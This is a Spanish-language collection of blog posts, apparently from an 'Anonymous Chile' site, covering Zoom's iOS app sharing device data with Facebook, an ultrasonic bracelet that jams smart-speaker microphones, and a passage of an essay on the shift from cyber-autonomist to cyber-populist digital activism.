A lo largo de todo el mundo muchas empresas e instituciones educativas han implementado dinámicas de trabajo y clases a distancia para que los colaboradores y los estudiantes no se trasladen y así evitar el contagio con el COVID-19. En este contexto, el uso de herramientas colaborativas para realizar videoconferencias, como era de esperarse, ha crecido en el último tiempo. Sin embargo, distintos problemas de seguridad, y también vinculados a la privacidad de los datos que manejan herramientas como Zoom, han salido a la luz recientemente, lo cual no hace más que poner sobre la mesa las precauciones que deben tener empresas, instituciones educativas, colaboradores, docentes y estudiantes. Y es que, aparentemente, hay un asunto muy delicado con este sitio y la forma en la que utiliza los datos privados de sus usuarios. Ya que todo apunta a que esa información la estaría compartiendo automáticamente con la gente de Facebook.

Según relata un artículo de VICE publicado el 26 de Marzo, la aplicación y plataforma de vídeoconferencias «Zoom» para iOS de manera automática envía algunos datos analíticos a Facebook, incluso si los usuarios de Zoom no tienen una cuenta de aquella otra red social. Y todo pasaría sin que las personas sepan que sucede eso en segundo plano. La publicación afirma que al descargar y abrir la aplicación al instante se conecta a la API Gráfica de Facebook. De modo que con ello Zoom notifica a Facebook cuando se abre la aplicación junto a detalles del dispositivo del usuario, incluyendo el modelo, operadora móvil y ciudad desde la que se conecta.

Días después de la publicación de la noticia Zoom lanzó un comunicado indicando que recientemente corroboraron que el Kit de Desarrollo de Software (SDK, por sus siglas en inglés) de Facebook, que la app utilizaba para permitir la función “iniciar sesión con Facebook”, estaba recolectando datos innecesarios del dispositivo, por lo que eliminarían el SDK de Facebook y reconfigurarían la utilidad para que los usuarios puedan iniciar sesión con Facebook a través del navegador. Pero lo más preocupante de todo sería que también genera al momento un perfil individual en donde la suma de información recopilada ayudaría a determinar qué clase de anuncios le son mostrados en esa y otras apps.

En un nuevo artículo publicado por VICE, Zoom ha declarado que:

Los datos recopilados por el SDK de Facebook no incluían ninguna información personal del usuario, sino que incluían datos sobre los dispositivos de los usuarios, como el tipo y la versión del sistema operativo móvil, la zona horaria del dispositivo, el sistema operativo del dispositivo, el modelo y el operador del dispositivo, el tamaño de la pantalla, el procesador y espacio en disco.

Tomamos muy en serio la privacidad de los usuarios. Originalmente implementamos la función ‘Iniciar sesión con Facebook’ usando el SDK de Facebook para proporcionar a nuestros usuarios otra forma conveniente de acceder a nuestra plataforma. Sin embargo, recientemente nos enteramos de que el SDK de Facebook estaba recolectando datos innecesarios del dispositivo. Para abordar esto, en los próximos días, eliminaremos el SDK de Facebook y reconfiguraremos la función para que los usuarios puedan iniciar sesión con Facebook a través de su navegador. Los usuarios deberán actualizar a la última versión de nuestra aplicación una vez está disponible para que estos cambios tengan efecto, y los alentamos a que lo hagan. Nos disculpamos sinceramente por este descuido y seguimos firmemente comprometidos con la protección de los datos de nuestros usuarios.

Will Strafach, un investigador de iOS y fundador de la aplicación para el mismo sistema centrada en la privacidad, Guardian Firewall + VPN, confirmó los hallazgos de Motherboard de que la aplicación Zoom envió datos a Facebook y que también tiene otros posibles problemas de privacidad. Según la EFF, los anfitriones de las llamadas de Zoom pueden ver si los participantes tienen la ventana Zoom abierta o no, lo que significa que pueden monitorear si las personas estan prestando atención en la reunión. Los administradores también pueden ver la dirección IP, los datos de ubicación y la información del dispositivo de cada participante, agregó.

En el mismo escrito anteriormente mencionado, se confirmó que Zoom lanzó una actualización para iOS que evitaba el envío de ciertos paquetes de datos a Facebook. Si bien Zoom no recolectaba información personal del usuario, sí enviaba información del sistema operativo del dispositivo y la versión, la zona horaria, el modelo del dispositivo, la empresa de telefonía contratada por el usuario, tamaño de la pantalla, núcleos del procesador y espacio en el disco.

Falsos sitios de Zoom para distruibuir malware

Por último, un reporte publicado recientemente reveló un importante incremento en el registro de dominios que incluyen como parte de su nombre la palabra “Zoom”. Esto responde en gran medida al accionar de cibercriminales, que intentan aprovechar la demanda por herramientas de este tipo, dado que muchos trabajan remotamente para evitar el contagio del COVID-19, para engañar a los usuarios haciéndoles creer que se trata de la herramienta oficial para que descarguen ejecutables que derivan en la descarga de malware en sus dispositivos, explicó la empresa de seguridad CheckPoint.

Alternativas a Zoom de código libre

  • TOX
  • Jami
  • XMPP
  • Wire
  • Mumble
  • Signal
  • Matrix
  • Keybase
  • Linphone

Brazalete del silencio contra micrófonos inteligentes

Publicada el 30/04/2020 - 02/08/2021 por Anonymous Chile

Por diseño, los teléfonos y altavoces inteligentes tienen micrófonos que siempre están encendidos y escuchan las llamadas palabras de activación como «Alexa», «Hey, Siri» u «OK, Google». Solo después de escuchar esa señal se supone que deben comenzar a grabar. Pero sólo «se supone»… y no nos referimos sólo a que se pueda espiar de forma intencionada: varios estudios ya han demostrado que los dispositivos se activan docenas de veces diariamente y comienzan a grabar después de escuchar frases similares a sus palabras de activación, sobretodo a través de la TV, la radio u otras conversaciones.

Cabe mencionar que ha sido demostrado en múltiples ocasiones que estos dispositivos son capaces de escuchar a los usuarios incluso cuando no se les pide realizar una acción explícitamente. Las compañías realizan estas tareas de seguimiento y recolección de información con la excusa de mejorar el aprendizaje automático de estos dispositivos, aseguran especialistas de una empresa de ciberseguridad.

Esta recolección de datos puede ser perjudicial para los profesionales que operan información confidencial de forma rutinaria, como profesores a distancia, médicos, abogados, funcionarios públicos y ejecutivos de empresas privadas.

Especialistas en ciberseguridad afirman que ni siquiera es necesario que el usuario hable en voz alta para desencadenar este escenario, pues un asistente de voz puede ser invocado incluso por el ruido generado por el televisor o la radio. Un experimento llevado a cabo por especialistas de Northeastern University concluyó que un smart speaker empleado en un hogar normal podría ser activado por accidente hasta 20 veces al día.

Por ello, Heather Zheng y Ben Zhao, profesores de informática en la Universidad de Chicago, junto con el profesor asistente Pedro Lopes han diseñado un «brazalete de silencio» o jammer que bloquea Amazon Echo o cualquier otro micrófono cercano que pueda escuchar las conversaciones del usuario.

El brazalete tiene 24 altavoces que emiten señales ultrasónicas cuando el usuario lo enciende. El sonido es imperceptible para la mayoría de los oídos, con la posible excepción de los más jóvenes y los perros, pero los micrófonos cercanos detectarán el sonido de alta frecuencia en lugar de otros ruidos.

«Es muy fácil grabar en estos días», dijo Lopes. “Esta es una defensa útil. Cuando tenga algo privado que decir, puede activarlo en tiempo real. Cuando reproduzcan la grabación, el sonido desaparecerá».

Durante la PoC, podemos observar como al encender el brazalete se genera un ruido blanco estático que enmascara las conversaciones:

Por el momento, el brazalete es solo un prototipo. Los investigadores dicen que podrían fabricarlo por tan solo $20 y un puñado de inversores ya han preguntado sobre su comercialización.

Cifras reportadas por el Instituto Internacional de Seguridad Cibernética (IICS) aseguran que alrededor de 60 millones de estadounidenses cuentan con al menos un smart speaker en sus hogares. Además, el uso de estos dispositivos se ha vuelto algo increíblemente común, lo que incrementa el alcance de esta actividad de recolección de datos a niveles inusitados. Los usuarios deben ser conscientes de que los empleados de estas compañías escuchan activamente algunas muestras de sus interacciones con estos dispositivos, por lo que no está de más considerar si realmente vale la pena emplear estos equipos de forma rutinaria.

Del ciber-autonomismo al ciber-populismo: una historia de la ideología del activismo digital

Publicada el 29/04/2020 - 13/03/2022 por Anonymous Chile

Introducción

La expresión “Activismo digital” es ampliamente utilizada para describir distintas formas de activismo que se sirven de la tecnología digital que han sido atravesadas por una rápida transformación desde su emergencia en el amanecer de la Internet. En la actualidad es posible identificar dos grandes olas. La primera se corresponde con la popularización temprana de la Internet y el auge de la Web a mediados de los ’90. Esta ola abarcó una cantidad de proyectos e iniciativas impulsadas por las activistas de la tecnología y los medios alternativos que se enmarcaban en el movimiento anti-globalización, incluyendo el sitio de noticias alternativas Indymedia, las listas de correo alternativas, grupas hackers (o hacktivistas) y laboratorios hacker (o hacklabs). La segunda ola coincide con el auge de la así llamada Web 2.0, los sitios de redes sociales como Facebook, YouTube y Twitter, que fueron acompañadas por el surgimiento de los famosos colectivos hacker Anonymous y Lulzsec; así como por el “activismo de medios sociales” del 15M, Ocuppy y otros movimientos de las plazas, cuyas organizadoras utilizaron los sitios de medios sociales como plataformas para la movilización de masas. ¿En qué medida estas dos fases del activismo digital son simples reflejos de la evolución de la tecnología digital y del salto de la Web 1.0 a la Web 2.0 (como usualmente se las describe)? ¿Debemos entender sus diferencias como derivadas de los cambios en las posibilidades materiales de una tecnología digital en un momento de rápida innovación o hay que agregar algo más a la ecuación?

Hasta el momento, el debate sobre la transformación del activismo digital ha tendido a seguir la típica tendencia tecno-determinista que considera a la tecnología como la causa última de la transformación social. Esta concepción es sostenida por la popularidad que han tomado términos como “revolución 2.0” (Ghonim, 2012), “wiki-revolución” (Ferron & Massa, 2012) o “twitter-revolución” (Morozov, 2009), utilizados ampliamente en los medios y estudios académicos para referirse a los movimientos de protesta que se sirven de la tecnología digital. La racionalidad subyacente en estas expresiones es que la adopción de un cierto tipo de plataforma, como Facebook o Twitter, define automáticamente la forma de activismo que se manifiesta a través de ellas. Este abordaje proviene de una visión simplista de los efectos de la tecnología que está profundamente enraizada en la teoría de medios de McLuhan y su famosa frase “el medio es el mensaje” (McLuhan, Gordon, Lamberti, & Scheffel-Dunand, 2011; McLuhan & Fiore, 1967) y según la cual, el uso de un determinado dispositivo tecnológico resulta en una serie de consecuencias inevitables. La escuela de la ecología de medios basada en las obras de McLuhan tiene cosas muy importantes para decir sobre la forma en que la tecnología estructura la acción, por ejemplo la forma en que las diferentes tecnologías de la comunicación (como el teléfono, la TV o Internet) traen consigo distintas arquitecturas comunicacionales (una-a-una, una-a-muchas, muchas-a-muchas) y diferentes disposiciones para las usuarias de esas tecnologías (Lundby, 2009; Postman, 1985). Sin embargo, tiende a descuidar los factores no-tecnológicos –los socio-económicos, políticos y culturales– que intervienen en la definición del contenido del activismo. Para superar esta visión simplista de la tecnología como una fuerza no-mediada capaz de dar su propia forma a las estructuras organizacionales y las prácticas de protesta, el análisis del activismo digital necesita recuperar una comprensión de la ideología, entendida como una cosmovisión y un sistema de valores que da forma a la acción colectiva y de cómo la ideología interactúa con la tecnología para dar forma a las prácticas activistas.

El argumento puede ser resumido esquemáticamente así: las activistas anti-globalización adoptaron un abordaje tecno-político al que describo como ciber-autonomista, enraizado en la contra-cultura de los ’70 y ’80, la cultura DIY y la tradición de los medios alternativos; desde las radios piratas hasta los fanzines. Estas diferentes inspiraciones compartían un énfasis en la lucha por la liberación de las personas y las comunidades locales de la interferencia de las instituciones de mayor escala. Con estos antecedentes, el ciber-autonomismo tomó la Internet como un espacio autónomo. El movimiento de las plazas, en cambio ha adoptado una actitud ciber-populista que ve a la Internet como un espacio de movilización de masas donde las personas individuales se unen en una subjetividad inclusiva y sincrética. Este abordaje refleja el giro populista que ha marcado el movimiento de las plazas, como la adopción de un discurso del pueblo o del 99% contra las élites (Gerbaudo, 2017).

Estas dos orientaciones tecno-políticas reflejan el proceso de evolución tecnológica que fue desde la más elitista web 1.0, a la masificada web 2.0 con sus sitios de redes sociales. Pero para analizarlas no es cuestión de reducirlas a la mera transformación tecnológica, también hace falta abarcar una pluralidad de otros factores y tomar en cuenta el cambio abismal en las actitudes y percepciones causadas por la crisis financiera de 2008 y los desarrollos ideológicos relacionados. En paralelo al giro de los movimientos sociales desde el anarco-autonomismo al populismo como forma dominante de la ideología contestataria, el activismo digital ha transicionado de tomar a Internet como un espacio de resistencia y contestación contra-cultural, hacia un espacio de movilización contra-hegemónica.

El artículo comienza como una discusión teórica sobre los diferentes factores involucrados en la transformación del activismo digital y en particular, sobre la relación entre tecnología, política y cultura. Se subraya la necesidad de prestar más atención a los factores políticos, culturales e ideológicos para comprender el activismo digital más allá del tecno-determinismo que actualmente domina su cobertura. Intento demostrar cómo los cambios ideológicos han dado forma a la transformación del activismo digital, explorando la transición del ciber-autonomismo al ciber-populismo y cómo se ha manifestado en algunos ejemplos concretos. Concluyo con algunas reflecciones sobre las implicancias de investigaciones futuras sobre el activismo digital, enfatizando la necesidad de traer la ideología de vuelta al análisis de los movimientos de protesta en la era digital.

La tecno-política más allá del tecno-determinismo

El activismo digital es una forma de activismo que pone en el eje de su discusión la relación entre política y tecnología. Para hacer uso de un término en boga entre las activistas e investigadoras en los últimos años, se trata de la naturaleza y la dinámica de la “tecno-política”. “Tecno-política” es un término acuñado por el político y académico italiano Stefano Rotodà (1997) para referirse al nexo entre la política y la tecnología, que desde entonces ha sido popularizado por académicas y activistas (como Javier Toret (2013) en España) para definir el nuevo campo de análisis que enmarca el activismo digital. Al referirnos a los dos conceptos constitutivos de la tecno-política, podemos argumentar que hasta este momento los estudios sobre el activismo digital se han enfocado excesivamente en la tecnología antes que en la política. Las académicas han tendido a leer la transformación política como el resultado de la transformación tecnológica y por lo tanto, han soslayado que lo inverso también es apropiado, es decir, que los cambios políticos e ideológicos modifican la forma en que la tecnología es concebida y utilizada.

La naturaleza tecno-determinista de gran parte de la academia contemporánea sobre el activismo digital propone que la naturaleza de esta forma de activismo se deriva directamente de propiedades específicas de la tecnología. Esto puede verse en el debate respecto a los efectos de la cobertura mediática sobre el activismo digital. Un ejemplo es el libro de Earl y Kimport (2011) y la forma en que aborda los medios digitales como un grupo de aparatos que reducen los costos de participación y por lo tanto facilitan nuevas formas de interacción que anteriormente eran imposibles. En sintonía con gran parte de la literatura proveniente de las ciencias políticas, esta perspectiva propone una comprensión instrumental y económica de los efectos de los medios, como puede verse en el lenguaje de los “costos” y “beneficios” que utilizan para explicar el uso de la tecnología digital. Este abordaje explica las ventajas prácticas que constituye la tecnología digital para las activistas, pero omite la dimensión simbólica y cultural del activismo digital, empezando por el mismo contenido de aquello que es canalizado a través de esa tecnología. Puede hacerse una crítica similar a la obra de Lance W. Bennett y Alexandra Sederberg. Su teoría describe una “acción conectiva” (Bennett & Segerberg, 2012) en oposición a la noción de la acción colectiva. Argumentan que los social media, con su capacidad de promover la conectividad, superan la lógica colectiva de los movimientos sociales anteriores y su necesidad de liderazgo e identidad colectiva (Bennett & Segerberg, 2012). Gracias a la tecnología digital, los movimientos pueden volverse más personalizados y menos controlados por centros organizacionales. Pero lo que se soslaya en este contexto es que la aplicación liberadora de la tecnología digital está muy lejos de ser el resultado inevitable. Las potencialidades de la tecnología digital pueden volverse hacia objetivos políticos totalmente distintos y acoplarse a diferentes formatos organizacionales. Resulta suficiente pensar que por ejemplo, fenómenos políticos tan dispares como Occupy Wall Street y la campaña presidencial de Donald Trump, se hayan servido tan eficientemente de los social media, aun en formas y estructuras organizacionales radicalmente distintas.

Este elemento tecno-determinista también se encuentra presente en la obra de Manuel Castells. Para ser justas, el registro de Castells tiene muchos más matices que los puramente estructuralistas que provienen del resto de las ciencias políticas. Esto es así porque Castells trabaja desde la tradición sociológica y su abordaje también toma en cuenta los factores culturales que se ponen en juego en la Internet y el activismo digital. A diferencia de otras autoras, no ve a la tecnología como un monolito todopoderoso, sino también como un producto social y cultural. Desde este punto de vista Castells ha argumentado que un factor importante para comprender la cultura digital es la influencia del espíritu libertario de los movimientos de protesta de los ’60 y ’70 y la forma en que inspiraron la arquitectura distribuida de la Internet (Castells, 2004). Sin embargo, su teoría de la sociedad-red y su concepción sobre la tecnología digital como apartada de la estructura piramidal de la sociedad fordista hacia unas estructuras de red apropiadas a la sociedad de la información, todavía contiene algunos elementos tecno-deterministas. La tecnología provoca un cambio “morfológico” que atraviesa a toda la sociedad y tiene consecuencias en todos los campos y organizaciones que adoptan la tecnología digital. Esta perspectiva sin duda contiene un elemento de verdad, pero parece omitir la flexibilidad con la que los procesos organizacionales son influenciados. Es un error asumir que la tecnología digital tiende a erosionar las jerarquías. Como he demostrado en mis obras anteriores, el activismo digital no es un espacio horizontal sin líderes, sino que está acompañado por nuevas formas de liderazgo (2012, 2016).

Esta tendencia también puede observarse en las obras de Castells sobre los social media. Castells argumenta que la difusión de social media como Facebook y Twitter ha transformado la comunicación en Internet y ha introducido una nueva lógica mediática a la que describe como “auto-comunicación de masas” (Castells, 2009), que combina la lógica de la auto-comunicación de los medios personales una-a-una –como el teléfono– con las masas y la capacidad una-a-muchas de los medios masivos. Según Castells, esta lógica comunicacional estuvo en la base de los movimientos del 2011 como los indignados, Occupy y la primavera árabe y contribuyó fuertemente a su alcance masivo (Castells, 2012). Esto ciertamente provee razones poderosas para comprender la forma en que la segunda ola del activismo digital ha superado las políticas minoritarias de la primera ola. Los social media proveyeron las condiciones técnicas necesarias para que emerjan las nuevas formas de activismo. No obstante, Castells tiende a omitir cómo han convergido factores ideológicos y políticos en este cambio. Como veremos en el curso de este artículo, sin un cambio ideológico las nuevas oportunidades de movilización de masas ofrecidas por los social media no hubieran podido ser cosechadas por los movimientos de protesta.

La obra de Jeffrey Juris, antropólogo y alumno de Manuel Castells, ha seguido una línea similar de razonamiento, leyendo la transformación del activismo como resultado de la transformación tecnológica. En su influyente libro Networking Futures [Los futuros en red] (2008), Juris argumenta que el movimiento anti-globalización se basaba en un imaginario de la red que constituyó la inspiración clave de una cantidad de proyectos de activismo digital que emergieron en ese tiempo, incluyendo el sitio de noticias alternativo Indymedia y las listas de correo alternativas utilizadas por las activistas para organizar actividades y campañas específicas. En su obra sobre el movimiento de las plazas de 2011, Juris dice que esta ola tuvo una lógica diferente a la de la anti-globalización. Argumenta que hubo un cambio de una lógica de red de las activistas anti-globalización hacia lo que describe como una “lógica de agregación”. Esta transformación deriva de la evolución de la Web 1.0 hacia la Web 2.0 y esta lógica de agregación refleja las nuevas potencialidades de difusión masiva de las plataformas de social media. Esta lógica es apoyada por la “viralidad”, es decir la capacidad para la difusión rápida permitida por las redes sociales corporativas como Facebook y Twitter. Esta capacidad ha sido trasladada físicamente a las plazas ocupadas de 2011, rebosantes de grandes multitudes (Juris, 2012). El inspirador análisis de Juris provee algunas ideas interesantes sobre el apuntalamiento tecnológico que encontramos en la transformación de las tácticas de protesta. Aun así, omite cómo este cambio en la forma de protestar también está basado en cambios significativos en la cultura e ideología de las protestas.

Recuperando la cultura de la protesta

Mientras estos abordajes están en lo cierto al identificar la influencia que juega la tecnología en la política contemporánea, a menudo tienden a adoptar una posición reduccionista en esta relación causa-efecto, donde un cierto tipo de arreglo tecnológico lleva automáticamente a una cierta lógica de acción y se presta poca atención al proceso de mediación política o cultural que interviene en los diferentes ejemplos concretos de activismo digital. En efecto, el activismo digital no es solo un fenómeno técnico, es un fenómeno. Es una actividad que involucra la comunicación de ciertos mensajes, ideas, imágenes y por lo tanto, está compuesto no solo de una dimensión tecnológica, sino también de una cultural. La naturaleza cultural, así como más generalmente política del activismo digital debe ser tomada en cuenta para comprender por qué se ha desarrollado de esta manera y por qué ha cambiado a través del tiempo. Para superar el sesgo tecno-determinista de los debates contemporáneos es necesario prestar atención a la compleja imbricación de la política, la cultura y la tecnología, con referencias específicas a a) la autonomía relativa de la política respecto de la tecnología; b) el carácter simbólico y no solo material de los procesos tecnológicos; c) el rol de la tecnología como mediadora de relaciones sociales y formas de vida que no pueden ser reducidas a la tecnología misma.

En primer lugar, un problema clave en los abordajes tecno-deterministas es la forma en que la tecnología es vista como una variable independiente siempre obligada a determinar la lógica de acción de los movimientos sociales y en consecuencia, como algo que debe ser dirigido en una cierta dirección. Este acercamiento descuida lo que puede describirse como “la autonomía relativa de los procesos políticos y culturales de la tecnología”, es decir la forma en que la cultura y la política son influenciadas pero no reducibles a la tecnología. La tecnología no define por sí misma el activismo, sino que el activismo está siempre informado por los contenidos culturales que canaliza, por las ideas, imágenes y puntos de vista que promueve. Una cantidad de obras recientes ilustran este punto.

En su libro CyberLeft [CiberIzquierda], Wolfson observa el movimiento anti-globalización y su uso de los medios digitales y resalta cómo las prácticas asociadas son acompañadas por un ethos y “lógica cultural” que aborda la Internet no solo como una herramienta, sino también como un espacio de solidaridad donde luchas diferentes pueden unirse (2014). Barassi y Treré argumentan de forma similar que además de la evolución tecnológica, resulta importante tomar en cuenta la experiencia vivida por las activistas que utilizan esas tecnologías y la forma en que deconstruyen presunciones acerca de la naturaleza y el propósito de la tecnología (2012). Coleman argumenta que el hacking no es solo una práctica técnica, también es social y conlleva éticas y estéticas específicas, es decir, aspectos que son influenciados por la tecnología pero que no pueden ser reducidos a ellos (2013). Esto puede observarse en la forma en que las grupas hacker construyen su propio lenguaje y simbología, cuyo epítome es la máscara de Anonymous tomada de la película de culto V for Vendetta [V de Vendetta]. Por lo tanto es necesario prestar atención no solo a los dispositivos técnicos usados por las activistas, sino también a los contenidos culturales que canalizan a través de esas tecnologías.

En segundo lugar, es importante tomar en cuenta el hecho de que la tecnología no es solo un aparato material, una estructura técnica o instrumental con propiedades determinadas. Es también un objeto simbólico con significados y usos culturales asociados. Este es un aspecto que ha sido ampliamente documentado en la literatura sobre la domesticación de los medios y la tecnología (Berker, Hartmann, & Punie, 2005) y en los estudios culturales sobre ciencia y tecnología (Menser & Aronowitz, 1996; Van Loon, 2002). Las académicas han mostrado que las tecnologías pueden asociarse a diferentes significados dependiendo de los contextos sociales y culturales que las utilizan. Como demuestra Kavada, el activismo digital refleja las propiedades de la Internet como conjunto de dispositivas técnicas y también a las culturas que han emergido dentro suyo, como la cultura hacker (2013). La Internet no es solo una tecnología, también es un espacio cultural y resulta difícil separar ambos aspectos. Esto llama a la necesidad de explorar el rol que juegan las distintas culturas y subculturas de Internet y su influencia sobre el activismo digital.

En tercer lugar, deberíamos evitar tener una visión instrumental de la tecnología en tanto herramienta en sí misma y en su lugar apreciar la forma en que la tecnología media relaciones sociales, ya que en última instancia es la forma más importante en la que la tecnología tiene un efecto sobre los fenómenos sociales. Este abordaje es central al que hicieron Marx y Engels de la tecnología industrial. Lo que importaba no solo era la forma en que habilitó nuevas formas de producción, también era el hecho de que materializó una relación de opresión, el de la burguesía sobre el proletariado (s. f.). El análisis tecno-determinista tiende a suspender este aspecto, pasando por alto el hecho de que la tecnología es una mediadora de cierta relación social, ya sea de opresión, liderazgo o cooperación. Aún más, pasa por alto la forma en que la tecnología se incrusta en ecologías sociales más amplias (no solo de la comunicación) y en las relaciones sociales que se establecen dentro de estas.

Lim ha demostrado cómo la efectividad de los social media para circular información relevante a los movimientos de protesta que eventualmente llevaron a las protestas en la plaza Tahrir en 2011 fue la presencia de densas redes sociales offline. Esto está ejemplificado en la forma en que las taxistas del Cairo facilitaron la circulación de información a través del boca a boca, repitiendo lo que habían escuchado decir a pasajeras anteriores sobre “lo que se anda diciendo en Facebook” (2012). Los efectos de la tecnología dependen entonces de lo que permiten y también de las relaciones sociales y las formas de vida en las que se enredan. Este aspecto resalta la necesidad de apreciar la incrustación de la tecnología en diferentes comunidades culturales y la forma en que el uso tecnológico depende de las costumbres, valores y normas que esas comunidades adoptan.

Estas críticas piden por un abordaje matizado de la relación entre tecnología y política, que trate sobre cómo la tecnología influencia la política y como a su vez la política influencia a la tecnología. La forma de alcanzar este objetivo es resucitar la noción de ideología, entendida en un sentido neutral como un sistema de valores y creencias adoptado por actoras políticas y sociales que les permiten actuar colectivamente. Ideología es un término que provee una forma de explorar la compleja imbricación de factores políticos, culturales y sociales que junto a la tecnología influencian cómo se practica el activismo digital.

Algunas académicas han comenzado a explorar cómo las diferentes prácticas tecnológicas conllevan sus propias ideologías. Por ejemplo, Turner argumenta que el desarrollo de la ciber-cultura estuvo basado en la ideología del tecno-utopismo y el tecno-libertarianismo, a su vez influenciadas por la contra-cultura de los ’70 y ’80, poniendo énfasis en la auto-realización individual y la sospecha en las instituciones de gran escala (2010). Barbrook y Cameron argumentaban que el auge de la economía digital en los ’90 manifestaba una ideología rudimentaria que describieron como la ideología californiana: una cosmovisión tecno-libertarian asociando yuppies[^yuppie] con hippies (1995). Un elemento ideológico es claramente visible en los social media, que no son solo un conjunto de aplicaciones con una determinada capacidad material. Como otros medios, poseen sus propias ideologías mediáticas (Gershon, 2010). En este caso lo que podríamos llamar “la ideología de los social media” se manifiesta en el lenguaje de compartir, de explotación multitudinaria [crowd-sourcing], de solicitudes de amistad y colaboración que han introducido [Fuchs (2013);Lovink (2011);van-dijck-2013]. Sobre esta literatura acerca del nexo entre tecnología e ideología, desarrollo una periodización del activismo digital separada en dos olas con características ideológicas distintivas y “orientaciones tecno-políticas” conectadas, es decir formas ideológicas distintas de concebir la relación entre política y tecnología.

De 1990 al 2010: El activismo digital desde la contra-cultura a la contra-hegemonía

Al poner la transformación del activismo digital a través de la lente de la ideología podemos apreciar la forma en que los factores políticos y culturales se combinan con los tecnológicos para dar forma al contenido de varias formas de activismo que se canalizan a través de los social media. Al ser una forma de activismo profundamente entramada con la tecnología, el activismo digital refleja la naturaleza y la transformación del ecosistema de comunicaciones digitales (Treré, 2012). Sin embargo, esta influencia tecnológica es “filtrada” por una cantidad de factores políticos y culturales y más específicamente “orientaciones tecno-políticas” que determinan cómo una cierta tecnología es concebida y utilizada. Esta concepción de la tecnología que describo con el término orientación tecno-política, tiene un carácter altamente ideológico ya que involucra el punto de vista de los valores sobre Internet y su rol en la sociedad y la política. Sus consecuencias también son ideológicas ya que son guías para la acción colectiva.

Siguiendo esta línea de pensamiento necesitamos explorar cómo los procesos evolutivos del activismo digital que normalmente se entienden como simples frutos de la evolución de la tecnología, de hecho reflejan un cambio en la ideología de los movimientos de protesta y su posición tecno-política. Este puede verse más claramente en el “activismo 1.0” seguido por el “activismo 2.0” en paralelo con la transición entre “web 1.0” y “web 2.0” y reflejando el cambio tecnológico y sus capacidades. Resulta obvio que hay algo de verdad en este paralelismo. No obstante, intentaré demostrar que las causas de esta transformación son más complejas y no pueden ser reducidas solo a factores tecnológicos. En efecto, además de coincidir con dos olas de la evolución tecnológica, estas dos olas de activismo digital también coinciden con dos fases de movilización de movimientos sociales cada cual con sus propias características.

Estas dos fases de protesta son el movimiento anti-globalización alrededor del cambio de milenio y el movimiento de las plazas de 2011. Estos dos movimientos de protesta comparten muchas similaridades, al punto que algunas activistas ven al segundo como continuación del primero. Al mismo tiempo estas olas han expresado orientaciones ideológicas diferentes que reflejan el cambio en la situación social y política desde el arribo de la crisis económica del 2008 y por lo tanto, se convierten en casos de estudios interesantes para un análisis comparativo. Mientras la ideología dominante del movimiento anti-globalización era anarco-autonomista (o autonomista para sintetizar) en tanto combinación del anarquismo y el autonomismo, el movimiento de las plazas se ha caracterizado por la influencia del populismo de izquierda (Gerbaudo, 2018). Este giro ideológico en los movimientos sociales tiene un correlato con el cambio en la orientación tecno-política de los movimientos sociales: el ciber-autonomismo en la primera ola y el ciber-populismo en la segunda del activismo digital.

Una periodización ideológica del activismo digital

La transformación del activismo digital en las últimas décadas puede esquematizarse como un movimiento desde los márgenes hacia el centro de la arena política, desde una política contra-cultural de resistencia a una política contra-hegemónica de movilización popular. Entonces, mientras las formas tempranas de activismo digital concebían la Internet como un espacio contra-cultural separado, la segunda ola del activismo digital la aborda como parte de un mainstream político a ser ocupado por protestantes (Gerbaudo, 2015). Por lo tanto, las primeras consideran la Internet un santuario en el que las activistas pueden encontrar respiro del caracter opresivo de la sociedad. En cambio, las segundas consideran la Internet como una pieza fundamental de la sociedad contemporánea, donde se manifiestan las mismas contradicciones, pero también donde las activistas tienen la esperanza de desarrollar un proceso de movilización masiva capaz de atraer, no solo a las personas altamente politizadas, sino también a una sección significativa de la población general.

La evolución del activismo digital y la presencia de las dos olas es cercana a la de Karatzogianni, una académica de medios que ha estado trabajando sobre el activismo digital desde los 2000. Karatzogianni propone la existencia de cuatro olas (2015). La primera va desde el ’94 al 2001 y coincide con la fase temprana del movimiento anti-globalización, desde el levantamiento zapatista en México en el ’94 a las protestas en Génova que fueron violentamente aplastadas por la policía durante el 2001. La segunda fase va desde el 2001 hasta el 2007 y comprende la segunda fase del movimiento anti-globalización y su prominencia como movimiento político. Describe la tercera como la “difusión del activismo digital” refiriéndose a su migración hacia países del sur global, por fuera de Europa y Estados Unidos donde se desarrolló originalmente. La cuarta y última fase es cuando el activismo digital invade la política mainstream, con el auge de Wikileaks, los levantamientos de la primavera árabe, las revelaciones de Snowden, poniéndolo en el centro de los conflictos políticos y dejando de ser un fenómeno marginal.

Sin embargo, el presente documento es más simple y solo se enfoca en dos fases principales. Explica la transformación como resultado de cambios ideológicos, que a su vez reflejan cambios en la situación socio-política, opiniones y actitudes. Poner el foco en la ideología no significa negar el rol que juegan los factores tecnológicos, en particular el giro de la web 1.0 basada en sitios estáticos hacia la web 2.0 con sus redes sociales. Más bien sugiere que el impacto tecnológico no puede ser entendido desde una perspectiva meramente instrumental, sino que necesita abarcar una comprensión del cambio cultural que es facilitado e influenciado por la tecnología, pero no reducible a ella. Este abordaje puede aplicarse a las dos fases diferentes que se han identificado en este análisis: el movimiento anti-globalización y el movimiento de las plazas.

El movimiento anti-globalización se desarrolló alrededor del cambio de milenio y se manifestó en una serie de protestas de gran escala contra las instituciones ecónomicas globales como el Banco Mundial, la Organización Mundial del Comercio y las reuniones del G8. Fue un movimiento multifacético que abarcó corrientes ideológicas dispares como sindicatos, grupos troskistas, ambientalistas, ONGs tercermundistas y organizaciones religiosas. Sin embargo, su núcleo y especialmente las facciones más jóvenes estaban formados profundamente en el autonomismo y el anarco-autonomismo, una ideología híbrida inspirada en el movimiento anarquista y marxista posterior al ’68 y marcada por un fuerte espíritu anti-autoritario y anti-estatista. Esta ideología se enfocaba en un proyecto político autónomo, alejándose del estado y el mercado para intentar construir un espacio auto-gobernado de “lo común”. El movimiento de las plazas se ha volcado en cambio hacia el populismo de izquierda, o más específicamente hacia una tendencia del populismo que llamo ciudadanismo, es decir un populismo ciudadano, antes que un populismo del pueblo. Esta ideología se centra en una recuperación desde las bases de la democracia y las instituciones políticas por partes de las ciudadanas comunes, empezando por reunirse en el espacio público y los social media. Anhela la construcción de una democracia radical que permita una participación más auténtica que la que ofrecen las corruptas instituciones democráticas liberales.

Como veremos, esta oposición entre anarco-autonomismo y populismo es similar a la oposición entre ciber-autonomismo y ciber-populismo como orientaciones tecno-políticas dominantes de las dos olas del activismo digital. La forma en que las activistas conciben y utilizan la Internet refleja su cosmovisión general, su actitud frente al estado, la política y la población general, con sus opiniones y actitudes prevalentes.

Anti-globalización y ciber-autonomismo

